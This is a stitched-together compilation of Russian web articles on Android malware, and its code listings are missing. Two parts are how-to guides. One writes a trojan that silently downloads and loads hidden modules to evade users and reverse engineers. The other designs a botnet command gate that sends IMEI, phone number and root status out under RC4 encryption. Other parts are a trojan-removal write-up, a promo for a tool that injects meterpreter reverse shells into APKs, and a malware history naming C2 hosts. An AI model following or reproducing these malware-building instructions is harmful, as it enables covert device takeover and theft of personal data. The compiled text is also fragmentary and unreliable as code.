Как создать вирус на андроид


Пишем троян под Андроид - Cryptoworld

Когда мы говорим о плагинах и модульных приложениях, то в первую очередь имеем в виду обычный пользовательский софт. Однако модульный дизайн может быть не менее полезен при разработке руткитов и бэкдоров. Обычными средствами обновлять такой софт слишком палевно, да и не всегда возможно, а вот незаметно подгрузить модуль с новой функциональностью по сети — это пожалуйста. А если вынести ключевую функциональность в модули и удалять их сразу после загрузки, то можно серьезно подпортить жизнь реверсеру.

В классической Java есть класс под названием java.lang.ClassLoader. Его задача — загружать байт-код указанного класса (файл с расширением .class) в виртуальную машину во время исполнения приложения. Затем можно создать объект этого класса и вызывать его методы с помощью рефлексии. Такой вот способ динамической загрузки кода, который можно использовать для написания приложений с расширяемой функциональностью, или, попросту говоря, поддержкой плагинов.

В Android нет виртуальной машины Java и нет класса ClassLoader, но есть его аналог DexClassLoader, выполняющий ровно ту же функцию, но в отношении байт-кода Dalvik (и файлов .dex вместо .class соответственно). И, в отличие от настольной Java, где проще положить нужный jar-файл в CLASSPATH и не возиться с динамической загрузкой, в Android такой подход дает действительно много преимуществ, главное из которых в том, что функциональность приложения можно расширять и обновлять незаметно для пользователя и ни о чем его не спрашивая. В любой момент твое приложение может скачать файл с классом с сервера, загрузить, а затем удалить файл.

[ad name=»Responbl»]

Кроме этого, классы можно хранить прямо в пакете APK и загружать во время старта приложения. Профит здесь в том, что код загружаемых классов будет отделен от кода самого приложения и находиться в APK «не по адресу»; инструменты типа apktool, которыми так любят пользоваться реверсеры, их просто не увидят. С другой стороны, это скорее защита от дурака, так как нормальный реверсер быстро смекнет, что к чему.

Как бы там ни было, динамическая загрузка классов — очень полезная штука при написании не совсем «белых» приложений, поэтому любой security-специалист должен знать, как этот механизм работает и как он используется в троянах.

ПРОСТЕЙШИЙ ПРИМЕР

Чтобы все написанное далее было проще понять, сразу приведу пример рабочего загрузчика классов:

В целом здесь все просто: код загружает jar-архив /sdcard/myapp/module. jar с нашим классом, загружает из него класс com.example.modules.simple. Module, создает объект и вызывает метод run(). Обрати внимание на три момента:

  • DexClassLoader умеет загружать как «просто» файлы .dex, так и jar-архивы, последние предпочтительнее из-за сжатия и возможности использовать цифровую подпись;
  • второй аргумент конструктора DexClassLoader — это каталог, который он использует для сохранения оптимизированного байт-кода (odex), для простоты мы указываем приватный каталог самого приложения;
  • в качестве аргумента метода loadClass всегда необходимо указывать адрес класса вместе с именем пакета.

Чтобы проверить данный код на работоспособность, создадим простейший модуль:


Не торопись создавать новый проект в Android Studio, можешь накидать этот код в блокноте и собрать его в jar-архив прямо из командной строки:
javac -classpath /путь/до/SDK/platforms/android-23/android.jar
 Module.java
 
/путь/до/SDK/build-tools/23.0.3/dx --dex --output=module.jar
 Module.class
 

Удостоверься, что каталоги platforms/android-23 и build-tools/23.0.3 существуют, в твоем случае их имена могут отличаться.

[ad name=»Responbl»]

Если все пройдет гладко, на выходе ты получишь файл module.jar. Останется только добавить код загрузчика в приложение, положить module.jar на карту памяти, собрать и запустить приложение.

ДОЛОЙ РЕФЛЕКСИЮ

Рефлексия — хорошая штука, но в данном случае она только мешает. Один метод без аргументов с ее помощью вызвать нетрудно, однако, если мы хотим, чтобы наше приложение имело развитый API модулей с множеством методов, принимающих несколько параметров, нужно придумать что-то более удобное. Например, использовать заранее определенный интерфейс, который будет реализовывать каждый модуль.

Применив такой подход к приведенному выше примеру, мы получим следующие три файла:

Файл ModuleInterface.java с описанием API:

2. Файл Module.java с реализацией нашего модуля:

3.Новый загрузчик модуля (помести в свое приложение):

Это все. Теперь мы можем работать с модулем, как с обычным объектом. Более того, система сама отбракует модули (классы), несовместимые с интерфейсом, еще на этапе загрузки, поэтому нам не придется задаваться вопросами, а есть ли в модуле нужный нам метод.

КОГДА МОДУЛЕЙ МНОГО

С одним модулем разобрались, но что, если их будет много? Как вести учет этих модулей и не потеряться среди них? На самом деле все просто — для этого можно использовать hashmap. Еще раз изменим загрузчик:

Данный код загружает все jar-файлы из указанного каталога, загружает их классы Module, создает на их основе объекты и помещает их в хешмап modules. Обрати внимание на трюк, использованный при загрузке класса и размещении объекта в хешмапе. Он нужен для простоты: вместо того чтобы выяснять принадлежность каждого модуля/класса к пакету, мы просто условились, что имя jar-файла модуля будет соотноситься с именем пакета по схеме com.example.modules.ИМЯ_JAR_ФАЙЛА, так что мы сразу знаем полный адрес класса каждого модуля.

[ad name=»Responbl»]

Например, приведенный ранее модуль принадлежит пакету com.example. modules.simple (см. директиву package), поэтому его необходимо включить в jar-архив simple.jar (меняем —output=module.jar на —output=simple. jar в команде сборки). Когда придет время создать новый модуль (к примеру, remote_shell), первой строчкой в его исходниках ты укажешь package com. example.modules.remote_shell.Module; и запакуешь скомпилированный байт-код в jar-архив remote_shell.jar.

Имя jar-файла (без расширения) используется также в качестве ключа в хешмапе, поэтому, зная имя модуля, всегда можно запустить его методы:

БЕРЕМ МОДУЛИ С СОБОЙ

На данном этапе у нас уже есть приложение, способное загружать неограниченное количество модулей из указанного каталога и с удобством работать с ними. Осталось разобраться с тем, как распространять эти модули. Самый очевидный вариант — загружать их с сервера, пусть наш «троян» делает это раз в день, а после скачивания модулей запускает загрузчик модулей, чтобы подгрузить их в приложение. Рассказывать, как сделать это, я не буду, здесь все элементарно, и решение этой задачи ты найдешь в любой вводной статье или книге про разработку для Android.

Еще один вариант — включить модули в пакет с приложением. В этом случае наш троян будет иметь доступ к необходимым модулям сразу после первого запуска, что защитит от проблем с выходом в сеть. Когда же сеть появится, он сможет догружать модули с сервера, если это необходимо.

Чтобы включить модули в APK, их необходимо поместить в каталог assets внутри проекта (в нашем случае в assets/modules), а затем реализовать распаковщик модулей в нужный нам каталог. В коде это будет выглядеть примерно так:


Все очень просто. Код находит модули внутри пакета и поочередно копирует их в каталог /sdcard/myapp, из которого затем их можно будет подгрузить с помощью загрузчика.

ВЫВОДЫ

Создать приложение для Android, которое сможет обновлять само себя и расширять свою функциональность незаметно для пользователя, довольно легко, и автор этих строк неоднократно видел применение такого метода в реальных троянах. Для чего эту технику будешь использовать ты — решать только тебе, однако я хотел бы напомнить, что наш журнал не поощряет любые незаконные действия, а автор статьи будет совсем не рад узнать, что научил кого-то писать трояны, которых для Android и так уже слишком много.

Click to rate this post!

[Total: 23 Average: 3.5]

Как написать вирус для андроид. Часть 2

Начинаем второй мини урок или куда прикрутить наше чудо, которое мы написали. Я не буду описывать как написать админку с нуля или как правильно писать сайты. Тут будет чисто теория и методы. Итак приступим. Первое, что нам потребуется это гейт.

Гейт – это скрипт который будет принимать, отдавать команды. К примеру админка у нас стоит на http://site.ru/. Создаем скрипт gate.php. И кладём его в корень. Получаем наш гейт http://site.ru/gate.php. Важно: нельзя использовать слова gate и слова-маячки. Трафик может снифаться.

Этот скрипт будет принимать и отдавать команды. Самый верный способ – это отправка данных методом post и чтение вывода.

Получаем простую цепочку:

1. Определяем гейт.
2. Шлем отстук.
3. Забираем задачи, что гейт нам даст в ответ. (Лучше всего задачи забирать по одной, так как нам важно время обработки команд и память которыю мы используем на телефоне. Ведь там не как на компе, гигабайты ее. А java она все таки местами прожорливая.)
4. Шаг не всегда отрабатывает, так как не всегда нам нужно слать отчет о выполнении команд. Но если все таки надо. То мы это делаем 2м пунктом, но с определенным флагом.

Почему post? Чтобы в логах не было ничего кроме имени гейта.

А ,что слать то?

В отстук входят все основные параметры такие как imei, версия os, sdk, различные параметры пользователя. Кстати если вы не знаете как генерировать bot id, то imei будет в самый раз, чтобы различать всех ботов. Так как это уникальный параметр телефона. Все что вы считаете нужным, отсылаете, а ответ обрабатываете.

Список параметров рекомендуемый для отстука:
1. imei (id бота)
2. оператор
3. версия os
4. версия sdk(для разграничения функционала, так как до 4.4 и после разные методы работы используются)
5. модель телефона
6. серийный номер
7. есть ли рут (использовать расширенный функционал и консоль устройства)
8. версия билда (по этому параметру можно обновлять старые версии)
9. Номер телефона
10. Другии параметры важные вам

Формат запросов, самый удобный на мой взгляд это json. Но мы живем в 21м веке и этого мало. Это все надо шифровать еще.  Почему json? Его очень легко обрабатывать и на стороне сервера и на стороне клиента.Далее мы накладываем алгоритм шифрования. Самый простой это будет RC4, хотя их много, как говорится, на вкус и цвет товарища нет. Но тут мы столкнемся с одной проблемой, у нас могут появитсья всякого рода спец символы, с которыми возникнут сложности при передаче и декодировании. Выходом является обёртка из base64.

Алгоритм получается следующий:
1. Составляем json
2. Шифруем его RC4 или любым другим алгоритмом.
3. Оформляем в base64
4. Отправляем
5. Читаем вывод гейта.
6. Делаем все в обратном порядке. Снимаем base64 , расшифровываем, разбираем json. Если надо отрабатываем определенные действия.

Важный момент, что при обработке результата, нужно проверять, а действительно ли это админка. То есть должны быть специфичные сигнатуры ответа. Если их нет. То перестаем туда стучать.
Так же стоит учитывать, что на телефоне время отстука может чуток отличаться, я имею ввиду интервалы. Все это из-за специфичной работы сервисов на телефоне. Поэтому стоит брать время ожидания с запасом, для определения онлайн бот или нет.

Если что вспомню, допишу в комментариях. Получилось очень мало, так как написание админок – тема широко освещаемая. Просто механическая работа PHP программиста. Принял , обработал, отдал.

Следующий материал будет про сбор информации с телефона, где мы плотно рассмотрим, как и что можно с него грабить.

Первая часть статьи — Как написать вирус для андроид.

За статью отдельное спасибо автору.

Click to rate this post!

[Total: 11 Average: 3.4]

SMS-вирус под ОС Android или «Привет :) Тебе фото…» / Хабр


*Оригинальная картинка, наглым образом вытащеная из ресурсов apk
[прим. apk — расширение файла установки приложения на ОС андроид]
Вступление

Нежданно-негаданно, посреди рабочего дня на мой старенький Sony Ericsson K320i приходит смс следующего содержания:
привет [смайлик] тебе фото https:// m**o*an.ru/oujr/380688086*6*

В качестве отправителя значился человек, с которым я уже некоторое время не общаюсь. Посмотрев тест сообщения и отмахнувшись от телефона со словами «Очередной спам», я дальше погрузился в работу.
Все бы ничего, но через пару минут пришло аналогичное сообщение на второй телефон (Samsung Galaxy Gio). Номер отправителя совпадал.
Через 2 часа позвонил друг и попросил дать ему совет. Ему пришло похожее смс от его начальника. Успокоив его фразой: «По ссылке не переходи и будет тебе счастье», я решил, что нужно разобраться в ситуации.

Договоренности1) Технически правильно называть данный «зловред» не вирусом, а трояном. Автор умышленно пошел на данное ухищрение для упрощения. Заранее прошу прощения за это.
2) Автор в данной статье постарался поставить себя на место обычного пользователя, испытать и пережить все то, что испытавает он. Поэтому специализированные технические средства не применяются, а методы борьбы выбраны примитивные.

1. Подготовка

Поверхностно поискав в интернете информацию, было установлено, что ссылка в смс сообщении является ничем иным, как адресом на загрузку apk файла. А apk файл — вирусом «Trojan.SMSSend», заражающий мобильные устройства под управлением ОС Android. Главные задачи данного «зловреда» — перехватывать управление устройством и использовать его в своих целях: блокировка исходящих вызовов, отправка сообщений «с приветом» и другие мелкие пакости.

Перейдя по ссылке из браузера я благополучно получил ответ «403 Forbidden».

Понятно, значит, стоит фильтр по браузеру. Что ж, буду проверять «на кошках», как говорится.

Недолго думая, решил «положить на алтарь науки» свой планшет Samsung Galaxy Tab 2. Сделав бэкап, со спокойной совестью нажал на кнопку «Общий сброс». На всякий случай убедился, что на sim-карте нет денег и приступил к установке.

2. Установка

Захожу в настройки, в пункте меню «Неизвестные устройства», убираю галочку «Разрешить установку приложений из других источников, кроме Play Маркет».
Перейдя по ссылке из смс-сообщения, получил предупреждение браузера, следующего характера:

Соглашаюсь и нажимаю кнопку «Продолжить». Скачалось приложение F0T0_ALB0M.apk:

Устанавливаю. Ужасаюсь количеством permission (разрешений). Операционная система любезно предупреждает:

Это приложение может нанести вред устройству
Но я же не ищу легких путей, поэтому, «скрепя сердце», ставлю галочку «Я понимаю, что это приложение может нанести вред».Процесс установки
Когда приложение запрашивает права администратора, понимаю, что это последний этап. Нажимаю «Отмена», но диалог появляется снова. Эх, была не была, буду идти до конца, и нажимаю «Включить».

3. Вирус-приложение

Само приложение состоит из одной активити-картинки с обреченным котенком. Наверное таким образом разработчик пытался пошутить.

В этом месте, я немного забегу вперед (см. п.6) и приведу, код AndroidManifest.xml для лучшего понимания статьи.

AndroidManifest.xml
<?xml version="1.0" encoding="utf-8"?> <manifest android:versionCode="4" android:versionName="4.0" android:installLocation="internalOnly" package="com.android.systgec" xmlns:android="http://schemas.android.com/apk/res/android"> <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" /> <uses-permission android:name="android.permission.CALL_PHONE" /> <uses-permission android:name="android.permission.CALL_PRIVILEGED" /> <uses-permission android:name="android.permission.CHANGE_COMPONENT_ENABLED_STATE" /> <uses-permission android:name="android.permission.INTERNET" /> <uses-permission android:name="android.permission.READ_CONTACTS" /> <uses-permission android:name="android.permission.WRITE_CONTACTS" /> <uses-permission android:name="android.permission.READ_PHONE_STATE" /> <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS" /> <uses-permission android:name="android.permission.MODIFY_PHONE_STATE" /> <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" /> <uses-permission android:name="android.permission.RECEIVE_SMS" /> <uses-permission android:name="android.permission.SEND_SMS" /> <uses-permission android:name="android.permission.WAKE_LOCK" /> <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /> <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" /> <uses-permission android:name="android.permission.GET_TASKS" /> <application android:label="@string/app_name" android:icon="@drawable/icon" android:manageSpaceActivity=".ClearActivity" android:allowClearUserData="false" android:allowBackup="true"> <activity android:label="@string/app_name" android:name=".AppActivity"> <intent-filter> <action android:name="android.intent.action.MAIN" /> <category android:name="android.intent.category.LAUNCHER" /> </intent-filter> </activity> <activity android:name=".ClearActivity" /> <receiver android:name=".SmsReceiver"> <intent-filter android:priority="1000"> <action android:name="android.provider.Telephony.SMS_RECEIVED" /> </intent-filter> </receiver> <receiver android:name=".OnBootReceiver"> <intent-filter> <action android:name="android.intent.action.BOOT_COMPLETED" /> <action android:name="android.intent.action.QUICKBOOT_POWERON" /> <action android:name="android.intent.action.USER_PRESENT" /> </intent-filter> </receiver> <receiver android:name=".IncomingCallReceiver"> <intent-filter android:priority="1000"> <action android:name="android.intent.action.PHONE_STATE" /> </intent-filter> </receiver> <receiver android:name=".OutCallReceiver"> <intent-filter android:priority="1000"> <action android:name="android.intent.action.NEW_OUTGOING_CALL" /> </intent-filter> </receiver> <receiver android:name=".NetworkReceiver"> <intent-filter> <action android:name="android.net.conn.CONNECTIVITY_CHANGE" /> <action android:name="android.net.wifi.WIFI_STATE_CHANGED" /> </intent-filter> </receiver> <receiver android:name=".AdminReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN"> <meta-data android:name="android.app.device_admin" android:resource="@xml/policies" /> <intent-filter> <action android:name="android.app.action.ACTION_DEVICE_ADMIN_DISABLED" /> <action android:name="android.app.action.ACTION_DEVICE_ADMIN_DISABLE_REQUESTED" /> <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" /> </intent-filter> </receiver> <receiver android:name=".ServiceController" /> <service android:name=".SystemService" android:enabled="true" /> <service android:name=".DelService" android:enabled="true" /> </application> </manifest> 


В диспетчере приложений наш «зловред» гордо именуется «Google Play».

4. Удаление?

Благополучно заразив устройство, перехожу к фазе лечения. Сначала пробую удалить приложение. Захожу в «Диспетчер приложений» и вижу, что все кнопки заблокированы.

Понятно, значит, у приложения имеются права администратора и так просто удалить его не получится. Не беда, сейчас я их уберу. Захожу в пункт меню «Безопасность»->«Администраторы устройства» и убираю галочку напротив приложения.

Но, нет, не тут то было. Устройство благополучно переходит в настройки управления WiFi и зависает. Пришлось «прибивать» окно настроек.

Дальше хотелось решить вопрос «на корню», так сказать, и воспользоваться общим сбросом системы. Ну да, легко мне выбирать такой вариант — мои личные данные в бэкапе хранятся.

А как же обычные пользователи? У которых «внезапно» любимый телефон заразился вирусом. Они ведь даже исходящего вызова знакомому «тыжпрограммисту» не сделают. В общем, читерство это, не буду так делать.

Итог: штатными средствами нейтрализовать угрозу не удалось. Подключаем «тяжелую артиллерию».

Примечание для компаний

В дальнейших разделах используется описание действий связанных с использованием бесплатных версий продуктов некоторых компаний. Целью повествования не являются жалобы на компании или предоставляемые ими услуги.


5. Dr Web против вируса

Памятуя про хорошую лечащую утилиту «Dr.Web CureIt!», решил бороться с зловредом с помощью аналога под Android. Захожу на официальный сайт и качаю бесплатную версию антивирусника «Dr.Web для Android Light 9».
Устанавливаю, по WiFi обновляю сигнатуры.
Запускаю быструю проверку ― ничего.
Запускаю полную проверку ― тоже ничего.
Я разочарован! Печально вздохнув, удаляю антивирусник.

UPD от 6.09.14. На данный момент антивирусник успешно опознает данный зловред под детектом Android.SmsBot.origin.165. Алгоритм удаления такой же, как и при использовании Avast (см. ниже).

5. Avast против вируса

Мнение автораНикогда особо не любил антивирусник данной фирмы. Особенно после истории об удалении файла отвечающего за протокол tcp/ip в Windows XP. Но, чем «черт не шутит», установим.

Скачиваю и устанавливаю версию «Avast-Mobile-Security-v3-0-7700».
При старте запускается экспресс-сканирование, которое никаких вирусов в системе не находит.

Ну и ладно, мозг подсказал очередную идею: вот есть какой-то пункт меню «Управление приложениями», а что если…
Да, действительно загрузился список приложений в системе.

Пункта «Удалить» нет. Поэтому, пробую остановить приложение. Остановилось.
Жду 2-3 секунды, приложение снова в работе.

Ладно, попробую с другой стороны. Запускаю принудительную проверку системы. О_о, обнаружено вредоносное ПО. Нажимаю «Устранить все» [прим. как-то это звучит в духе Дарта Вейдера или Далеков]. Avast сообщает, что удалить приложение не может, а нужно сначала отобрать права администратора у приложения. Появляется системный диалог:

Удалить все данные с устройства и вернуть заводские настройки? Нажмите «Да» если согласны, или «Нет» для отмены

И сразу же, поверх этого диалогового окна открывается «злополучное» окно настроек wi-fi. Нажимаю «Возврат», снова открываются настройки. Хорошо, хоть окно настроек не зависает.

Опять на тропу читерства меня толкают. Будем искать другое решение…

6. Реверс-инжиниринг

Посмотрим в исходный код приложения, благо на Android это не такая большая проблема. Много всего интересного…
Например, в классе SystemService указан url сайта lamour.byethost5.com (дизайн-студия).
Но больше всего мне понравился класс AdminReceiver, который является наследником системного класса DeviceAdminReceiver.
В этом классе есть переопределенный метод onDisableRequested, который срабатывает при отключении админполномочий для данного приложения. Полностью заблокировать кнопки в системном диалоге нельзя, поэтому разработчик вируса пошел на хитрость, он изменил текст сообщения на «Удалить все данные с устройства и вернуть заводские настройки? Нажмите «Да» если согласны, или «Нет» для отмены» и обильно прикрыл сверху назойливым окном настроек.

Бинго. Значит теперь я смело смогу нажать в данном диалоговом окне «Удалить» и планшет будет «здоров».

Послесловие

Таким образом, выполнив повторно пункт 5 данной публикации (не останавливаясь на последнем шаге), вирус версии 4.0 (согласно манифест-файлу) был побежден.

Почему не удалось напрямую из настроек убрать галочку админправ для приложения, а только используя Avast? Скорее всего, стоит очередная ловушка с переопределенным методом.

Выводы

Разработчики вирусов находят все новые лазейки.
Но, так или иначе, браузер и операционная система стали лучше защищать пользователей.
Мне необходимо было нажать 2 подтверждения и поставить галочку в настройках «Неизвестные устройства».

Будьте здоровы, вы и ваши девайсы!

Как встроить вирус в Андроид приложение.

Сегодня соорудить вредоносное приложение для ОС Android не составляет никакого труда. Следующий shell-скрипт просто доводит это до уровня детского сада.

Backdoor-apk одной простой командой добавляет собственный backdoor в любой APK-файл — занавес! Единственное, что необходимо, — сформиpовать нужное окружение для программы, чтобы она выполнила свои функции. Для этого на Linux-машине потребуется наличие Metasploit, Apktool, Android SDK, smali.

На данный момент в инструменте реализована вставка следующих полезных нагрузок:

  • meterpreter/reverse_http;
  • meterpreter/reverse_https;
  • meterpreter/reverse_tcp;
  • shell/reverse_http;
  • shell/reverse_https;
  • shell/reverse_tcp.

Все это очень знакомо и функционально. Так что сегодня любой школьник может скачать нужную APK из Google Play и вставить в нее backdoor. А затем стащить твой телефон со стола и заменить нормальное приложение на протрояненное, и ты этого даже не заметишь.

[ad name=»Responbl»]

URL: https://github.com/dana-at-cp/backdoor-apk
Система: Linux

Click to rate this post!

[Total: 15 Average: 3.8]

История мобильного вирусописательства на примере Android — «Хакер»

Содержание статьи

Первый экспериментальный образец полноценного трояна для Android был представлен летом 2010 года на конференции DEF CON 18. С тех пор прошло уже более четырех лет, и за это время количество вирусов для мобильной ОС от Google выросло в тысячи раз, а Google успела придумать десятки различных методов противостояния угрозам. В этой статье мы детально исследуем мир вредоносов для Android и проследим противостояние поискового гиганта и хакеров.

 

До нашей эры, или как написать вирус за 15 минут

Первые попытки создать вредоносный софт для Android и доказать несостоятельность гугловской мобильной платформы с точки зрения безопасности начались с публикации первых предварительных версий Android SDK в 2007 году. Молодые студенты писали софт, который использовал стандартную функциональность смартфона для чтения SMS’ок, а «исследовательские» команды, вроде Blitz Force Massada, демонстрировали аж «30 векторов атак на Android», показывая, как можно использовать стандартные API Android во вредоносных целях.

Это было время игрушек, которые нельзя было назвать ни настоящим вредоносным ПО, ни тем более вирусами. То тут, то там появлялись приложения, вроде Mobile Spy от Retina-X Studios, которые позволяли удаленно читать текстовые сообщения, историю звонков, просматривать фотографии, видео, определять координаты смартфона. Встречались и различные поддельные приложения, такие как обнаруженный в маркете в январе 2010 года неофициальный клиент для различных банков, который ни с чем не соединялся, а просто уводил номера кредитных карт, введенных самим пользователем.

Более-менее настоящий троян был реализован только в 2010 году секьюрити-компанией Trustwave, которая продемонстрировала его на конференции DEF CON 18. Впрочем, Америки они не открыли; троян был всего лишь стандартным модулем ядра Linux, который перехватывал системные вызовы write(), read(), open() и close(), а также создавал реверсивный шелл по звонку с определенного номера. Вся эта функциональность позволяла подключиться к смартфону удаленно и скрытно использовать его возможности в своих целях, в том числе читать конфиденциальную информацию.

Для установки руткита требовался физический доступ к устройству, root-права и смартфон HTC Legend (модуль был совместим только с его ядром), поэтому ни о каком практическом применении руткита речи не шло. Proof of concept, который доказал только то, что ядро Linux и в смартфоне остается ядром Linux.

Настоящий троян в «дикой природе» (не маркете) был найден только в августе 2010 года. Правда, это был совсем не тот тип трояна, о котором принято писать в нашем журнале, а всего лишь SMS-троян, то есть, по сути, обычное приложение, которое шлет SMS на платные номера без ведома юзера. Игрушка, которую хороший программист напишет за полчаса, но очень опасная, попади она к обычному юзеру.

Троян, получивший имя Trojan-SMS.AndroidOS.FakePlayer.a, прикидывался видеоплеером под незамысловатым названием Movie Player и с иконкой стандартного проигрывателя из Windows. Приложение требовало права доступа к карте памяти, отправке SMS и получению данных о смартфоне, о чем система сообщала перед его установкой. Если все это не смущало пользователя и он соглашался с установкой и запускал приложение, оно повисало в фоне и начинало отправку SMS на номера 3353 и 3354, каждая из которых обходилась в пять долларов. Номера эти, кстати, действовали только на территории России, так что нетрудно догадаться о корнях автора данного «произведения».

В октябре был обнаружен другой тип SMS-трояна. На этот раз зловред использовал смартфон не для опустошения кошелька жертвы, а для кражи его конфиденциальных данных. После установки и запуска троян уходил в фон и пересылал все входящие SMS на другой номер. В результате злоумышленник мог не только завладеть различной конфиденциальной информацией пользователя, но и обойти системы двухэтапной аутентификации, которые для входа требуют не только логин и пароль, но и одноразовый код, отправляемый на номер мобильного телефона.

Интересно, что номер телефона злоумышленника не был жестко вбит в код трояна, а конфигурировался удаленно. Чтобы его изменить, требовалось отправить на номер жертвы особым образом оформленную SMS, которая содержала номер телефона и пароль. Пароль можно было изменить с помощью другой SMS, по умолчанию использовалась комбинация red4life.

 

Geinimi и все-все-все

Первый по-настоящему профессионально написанный и обладающий защитой от анализа вредонос для Android был обнаружен только в декабре 2010 года компанией Lookout. Троян, получивший имя Geinimi, качественно отличался от всего, что было написано ранее, и обладал следующими уникальными характеристиками:

  • Распространение в составе легитимного ПО. В отличие от всех остальных зловредов, которые только прикидывались настоящими программами и играми, Geinimi на самом деле внедрялся в реально существующие игры. В разное время троян был найден в составе таких приложений, как Monkey Jump 2, President Versus Aliens, City Defense and Baseball Superstars 2010, разбросанных по местным маркетам Китая и различным torrent-трекерам. Функциональность оригинального приложения полностью сохранялась, поэтому пользователь даже не догадывался о заражении смартфона.
  • Двойная защита от анализа. Код трояна был пропущен через обфускатор, что затрудняло его анализ, а все коммуникации с удаленным сервером шифровались (справедливости ради стоит сказать, что использовался ущербный алгоритм DES с ключом 12345678).
  • Возможность использования для организации ботнета. В коде Geinimi было найдено более 20 управляющих команд, которые позволяли выполнять такие операции, как установка и удаление приложений (правда, на это требовалось разрешение пользователя), получение списка всех установленных программ или запуск приложений.

В целом Geinimi действовал по следующему алгоритму. После запуска зараженного приложения создавался фоновый сервис, который собирал персональные данные: координаты устройства, номера IMEI и IMSI. Затем с интервалом в одну минуту он пытался связаться с одним из десяти удаленных серверов (www.widifu.com, www.udaore.com, www.frijd.com и другими), куда передавалась вся собранная информация и где собирались команды для удаленного исполнения.

Geinimi стал родоначальником полнофункциональных троянов для Android, и после его первого обнаружения на просторах интернета стали все чаще появляться зловреды с аналогичной или похожей функциональностью. Вскоре была найдена модификация Geinimi под названием ADRD, троян Android.Pjapps и множество других. Все они распространялись через различные сайты, torrent-трекеры, китайские неофициальные магазины, поэтому защититься от них можно было, просто не устанавливая приложения из неизвестных источников. Однако все изменилось, когда был обнаружен троян DroidDream, распространявшийся в составе более чем 50 приложений, опубликованных в официальном Android Market.

 

DroidDream и начало борьбы за чистоту маркета

В марте 2011 года пользователь Lompolo сообщил на reddit, что в маркете Android обнаружено нескольких десятков вредоносных приложений, опубликованных человеком с ником Myournet. Несмотря на заурядность самого трояна, а также уже известный способ распространения, основанный на внедрении кода в легитимное приложение, факт наличия малвари в маркете, а также предположения о том, что она использует эксплойт rageagainstthecage для получения прав root на устройстве, быстро подогрели интерес к новости пользователей и сотрудников различных секьюрити-компаний. За несколько дней начальный список из двух десятков приложений расширился до 56, а среди публиковавших его людей (или ботов, кто знает) обнаружились Kingmall2010 и we20090202.

Сам по себе DroidDream по функциональности был очень похож на упрощенный Geinimi, но не был его вариацией. Он также собирал информацию о смартфоне, отправлял ее на удаленный сервер (http://184.105.245.17:8080/GMServer/GMServlet) и получал в ответ управляющие команды. Плюс ко всему он также содержал в себе другое приложение, спрятанное в каталоге assets/sqlite.db внутри APK и устанавливаемое в систему под именем DownloadProvidersManager.apk. Очевидно, это была защита от удаления.

В сумме зараженные приложения успели установить от 50 до 200 тысяч пользователей, пока команда безопасности Google не отреагировала на сообщение и не удалила из маркета все найденные копии зловреда и аккаунты выложивших их пользователей. В дополнение в маркете также появилось приложение Android Market Security Tool, с помощью которого пользователь мог очистить смартфон от заразы. Но и здесь не обошлось без конфуза. Буквально через два дня после этого Symantec обнаружила на просторах интернета зараженную версию этого приложения, которая содержала в себе уже другой троян, названный впоследствии Fake10086 за выборочную блокировку SMS с номера 10086.

Факт проникновения малвари в Android Market (а после DroidDream в маркете было обнаружено еще несколько вирусов) заставил Google серьезно задуматься над безопасностью своего репозитория приложений, а так как вручную они ничего делать не привыкли, то в результате в начале 2012 года выкатили сервис Bouncer, который проверял приложения на безопасность с помощью запуска в виртуальной машине. Задача Bouncer состояла в том, чтобы производить многократный запуск софтины, симулировать работу пользователя с приложением и анализировать состояние системы до и после работы с приложением. Если никаких странных и подозрительных действий софтина себе не позволяла, то она пропускалась в маркет, в противном случае публикация блокировалась.

Если верить Google, то сразу после запуска Bouncer сократил количество вредоносов в маркете на 40% Однако позднее выяснилось, что его можно легко обойти, просто проанализировав некоторые характеристики системы, такие как email-адрес владельца «смартфона», версию ОС и так далее, а затем создав приложение, которое при их обнаружении будет действовать абсолютно законно и делать грязную работу только на настоящем смартфоне. Скорее всего, Google уже разработала схему противодействия обнаружению Bouncer (например, с помощью генерации уникальных виртуальных окружений для каждого приложения).

Конец 2011 года: начало стремительного роста количества вирусов для Android

 

Zeus-in-the-Mobile

Пять лет назад по компам пользователей начал свое победоносное шествие троян под названием Zeus. Благодаря изощренному дизайну и продвинутым техникам маскировки, делавшим его обнаружение невероятно трудной задачей, он смог распространиться на миллионы машин по всему миру и создать один из самых крупных ботнетов в истории; только в США было зафиксировано более трех с половиной миллионов случаев заражения.

Так выглядел интерфейс первой обнаруженной версии Zeus

Основная задача Zeus состояла в организации атаки типа man-in-the-browser, то есть использования техник кейлоггинга и формграббинга для перехвата частной пользовательской информации и ее отправки на удаленные серверы. За время своей работы Zeus смог утащить сотни тысяч логинов и паролей от популярных сервисов (Facebook, Yahoo!, hi5, metroFLOG, Sonico, Netlog) и, конечно же, множества онлайн-банков.

Разработчик Zeus быстро отреагировал на появление систем двухфакторной аутентификации и в 2010 году выпустил для Symbian и BlackBerry приложения, задача которых состояла в перехвате аутентификационных SMS-сообщений с одноразовыми кодами авторизации и их последующей отправке на все те же удаленные серверы. В середине 2012 года аналогичное приложение появилось и для Android.

Первая его версия была очень примитивна и представляла собой якобы секьюрити-приложение, которое при запуске выводит код верификации и закрывается. В результате в фоне повисает сервисный процесс, который занимается перехватом SMS и их отправкой на удаленный сервер. Последующие версии Zeus для Android обзавелись также системой удаленного управления с помощью сообщений с определенного номера, однако никаких продвинутых приемов маскировки или распространения вирус не использовал и в этот раз.

Тем не менее мобильная версия Zeus все-таки смогла наделать много шума в СМИ, но, как можно видеть, троян был сильно переоценен.

А так выглядела версия, обнаруженная спустя десять месяцев

 

Первый IRC-бот

В середине января 2012 года сотрудники «Лаборатории Касперского» сообщили, что обнаружен первый в истории Android IRC-бот. Приложение распространялось в виде установочного APK-файла размером чуть больше 5 Мб и выдавало себя за игру Madden NFL 12. Интересное отличие этого трояна от других было в том, что, по сути, вся его логика работы заключалась в нативных приложениях Linux, которые никак не светились в окне стандартного диспетчера задач Android и к тому же использовали локальный эксплойт для получения прав root.

